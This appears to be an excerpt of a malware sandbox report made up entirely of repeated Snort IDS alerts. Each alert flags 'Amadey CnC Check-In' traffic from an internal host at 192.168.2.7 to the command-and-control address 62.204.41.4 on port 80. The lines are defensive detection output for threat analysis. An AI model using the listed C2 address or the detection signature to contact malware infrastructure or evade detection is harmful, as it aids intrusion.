                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49758 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49759 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49760 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49761 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49762 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49763 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49764 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49765 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49766 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49767 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49768 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49769 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49770 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49771 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49772 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49773 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49774 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49775 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49776 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49777 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49778 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49779 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49781 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49782 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49783 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49784 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49785 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49786 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49787 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49788 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49789 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49790 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49791 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49792 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49793 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49794 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49795 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49796 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49797 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49798 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49799 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49800 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49801 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49802 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49803 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49804 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49805 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49806 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49807 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49808 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49809 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49810 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49811 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49812 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49813 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49814 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49815 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49816 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49817 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49818 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49819 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49820 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49821 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49822 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49823 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49824 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49825 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49826 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49827 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49828 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49829 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49830 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49831 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49832 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49833 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49834 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49835 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49836 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49837 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49838 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49839 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49840 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49841 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49842 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49843 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49844 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49846 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49847 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49848 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49849 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49850 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49851 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49852 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49853 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49854 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49855 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49856 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49857 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49858 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49859 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49860 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49861 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49862 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49863 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49864 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49865 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49866 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49867 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49868 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49869 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49870 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49871 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49872 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49873 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49874 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49875 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49876 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49877 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49878 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49879 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49880 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49881 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49882 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49883 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49884 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49885 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49886 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49887 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49888 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49889 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49890 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49891 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49892 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49893 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49894 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49895 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49896 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49897 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49898 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49899 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49900 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49901 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49902 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49903 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49904 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49905 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49906 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49907 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49908 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49909 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49910 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49911 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49912 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49913 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49914 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49915 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49916 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49917 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49918 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49919 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49920 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49921 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49922 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49923 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49924 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49925 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49926 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49927 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49928 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49929 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49930 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49932 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49933 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49934 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49935 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49936 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49937 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49938 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49939 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49940 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49941 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49942 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49943 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49944 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49945 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49946 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49947 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49948 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49949 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49950 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49951 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49952 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49953 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49954 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49955 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49956 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49957 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49958 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49959 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49960 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49961 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49962 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49963 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49964 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49965 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49966 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49967 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49968 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49969 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49970 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49971 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49972 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49973 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49974 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49975 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49976 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49977 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49978 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49979 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49980 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49981 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49982 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49983 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49984 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49985 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49986 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49987 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49988 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49989 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49990 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49991 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49992 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49993 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49994 -> 62.204.41.4:80
